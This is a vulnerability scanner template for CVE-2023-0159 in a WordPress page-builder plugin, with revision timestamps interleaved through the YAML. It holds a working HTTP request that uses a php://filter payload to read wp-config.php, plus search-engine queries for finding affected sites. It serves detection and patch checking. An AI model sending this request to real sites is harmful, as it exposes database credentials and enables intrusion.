2024-03-31 07:25:33 +00:00
id : CVE-2023-0159
info :
name : Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
author : c4sper0
severity : high
description : |
The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.
2024-03-31 17:45:32 +00:00
remediation : Fixed in 1.9.1
2024-05-31 19:23:20 +00:00
reference : |-
2024-03-31 07:25:33 +00:00
- https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/
- https://github.com/im-hanzou/EVCer
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/xu-xiang/awesome-security-vul-llm
2024-03-31 17:45:32 +00:00
- https://wordpress.org/plugins/extensive-vc-addon/
2024-03-31 07:25:33 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2023-0159
2024-05-31 19:23:20 +00:00
epss-score : 0.01059
epss-percentile : 0.84061
2024-03-31 07:25:33 +00:00
cpe : cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:*
metadata :
2024-06-07 10:04:29 +00:00
max-request : 1
2024-03-31 07:25:33 +00:00
vendor : wprealize
2024-06-07 10:04:29 +00:00
product : "extensive_vc_addons_for_wpbakery_page_builder"
2024-03-31 07:25:33 +00:00
framework : wordpress
2024-06-07 10:04:29 +00:00
shodan-query : "http.html:/wp-content/plugins/extensive-vc-addon/"
fofa-query : "body=/wp-content/plugins/extensive-vc-addon/"
2024-03-31 07:25:33 +00:00
publicwww-query : "/wp-content/plugins/extensive-vc-addon/"
2024-06-07 10:04:29 +00:00
tags : cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon,wprealize
2024-03-31 07:25:33 +00:00
http :
- raw :
- |
POST /wp-admin/admin-ajax.php HTTP/2
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php
matchers-condition : and
matchers :
- type : word
part : body
words :
- '{"status":"success","message":"Items are loaded","data":'
- type : status
status :
2024-03-31 17:45:32 +00:00
- 200
2024-06-08 16:02:17 +00:00
# digest: 490a00463044022001e71051c885b3bea2cba01983b29a1cc0c0d689cfcc4eb2506922805f31329d02200cb52bba1c8d1a09bb9e2aad7af4f0e949edf813254513232bd0bbd0d6ffdd4d:922c64590222798bb761d5b6d8e72950